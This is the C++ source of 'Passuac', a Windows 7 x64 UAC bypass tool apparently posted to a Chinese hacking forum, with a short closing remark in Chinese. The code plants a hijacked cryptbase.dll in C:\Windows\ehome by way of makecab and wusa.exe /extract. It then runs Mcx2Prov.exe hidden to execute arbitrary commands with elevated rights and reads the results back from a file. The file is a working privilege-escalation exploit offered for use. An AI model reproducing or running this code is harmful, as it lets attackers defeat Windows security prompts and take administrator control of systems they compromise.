// Passuac.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <direct.h>
BOOL IsUserInAdminGroup() //判断是否在管理员组
{
BOOL fInAdminGroup = FALSE;
HANDLE hToken = NULL;
HANDLE hTokenToCheck = NULL;
DWORD cbSize = 0;
OSVERSIONINFO osver = {0};
osver.dwOSVersionInfoSize = sizeof(osver);
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))
goto Cleanup;
if (!GetVersionEx(&osver))
goto Cleanup;
if (osver.dwMajorVersion >= 6)
{
TOKEN_ELEVATION_TYPE elevType;
if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize))
goto Cleanup;
if (TokenElevationTypeLimited == elevType)
{
if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize))
goto Cleanup;
}
}
if (!hTokenToCheck)
{
if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck))
goto Cleanup;
}
BYTE adminSID[SECURITY_MAX_SID_SIZE];
cbSize = sizeof(adminSID);
if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize))
goto Cleanup;
if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup))
goto Cleanup;
Cleanup:
if (hToken) CloseHandle(hToken);
if (hTokenToCheck) CloseHandle(hTokenToCheck);
return fInAdminGroup;
}
BOOL IsRunAsAdmin() //判断是否以管理员权限运行
{
BOOL fIsRunAsAdmin = FALSE;
DWORD dwError = ERROR_SUCCESS;
PSID pAdministratorsGroup = NULL;
SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
if (!AllocateAndInitializeSid(
&NtAuthority,
2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&pAdministratorsGroup))
{
dwError = GetLastError();
goto Cleanup;
}
if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))
{
dwError = GetLastError();
goto Cleanup;
}
Cleanup:
if (pAdministratorsGroup) FreeSid(pAdministratorsGroup);
return fIsRunAsAdmin;
}
BOOL writedll64()
{
char Szpath[MAX_PATH] = {0};
char uacexqute[1024] = {0};
DWORD dwWrite=0;
WORD wResID;
HANDLE hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("Getlasterror:%d.\r\n",GetLastError());
return 0;
}
HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");
HGLOBAL hG = LoadResource(NULL, hrsc);
DWORD dwSize = SizeofResource( NULL, hrsc);
WriteFile(hFile,hG,dwSize,&dwWrite,NULL);
CloseHandle( hFile );
getcwd(Szpath, MAX_PATH);
strcat(Szpath,"\\cryptbase.tmp");
system("makecab cryptbase.dll cryptbase.tmp");
sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);
ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);
//remove("cryptbase*");
DeleteFileA("cryptbase.dll");
DeleteFileA("cryptbase.tmp");
return true;
}
int main(int argc,char* argv[])
{
FILE* fp;
char szcmd[1024] = {0};
char *Options;
char buffer[2048] = {0};
STARTUPINFO si={sizeof(si)};
PROCESS_INFORMATION pi;
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=TRUE;
if (argc < 2)
{
printf("[*]:%s Passuac for windows 7 x64\n",argv[0]);
printf("[*]:%s Setp1: passuac\r\n",argv[0]);
printf("[*]:%s Setp2: shell_cmd\r\n",argv[0]);
printf("[*]:Welcome to www.90sec.org\r\n");
printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");
return 0;
}
strcpy(szcmd,argv[1]);
char szNewCmd[MAX_PATH] = {0};
wsprintfA(szNewCmd, "\"%s\"", szcmd);
if (!IsUserInAdminGroup())
{
printf("Your not have in Local Administrator Group\r\n");
printf("Program exit;");
exit(1);
}else
{
printf("Your have in Local Administrator Group\r\n");
printf("PassUac ing.....\r\n");
if (!IsRunAsAdmin())
{
if (!strcmp(szcmd,"passuac"))
{
writedll64();
}else
{
ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);
Sleep(4000);
fp = fopen("c:\\programdata\\uac.txt","rb");
if (fp == NULL)
{
printf("Getlasterror:%d\r\n",GetLastError());
return 0;
}
ZeroMemory(buffer,sizeof(buffer));
while (fgets(buffer,sizeof(buffer),fp))
{
printf(buffer);
}
fclose(fp);
}
}
}
return 0;
}
需要自己写个DLL,来进行参数解析。请看代码把。
代码写的相当烂,但是能够达到地步,还请各位莫笑话。
时间: 2024-08-26 11:20:14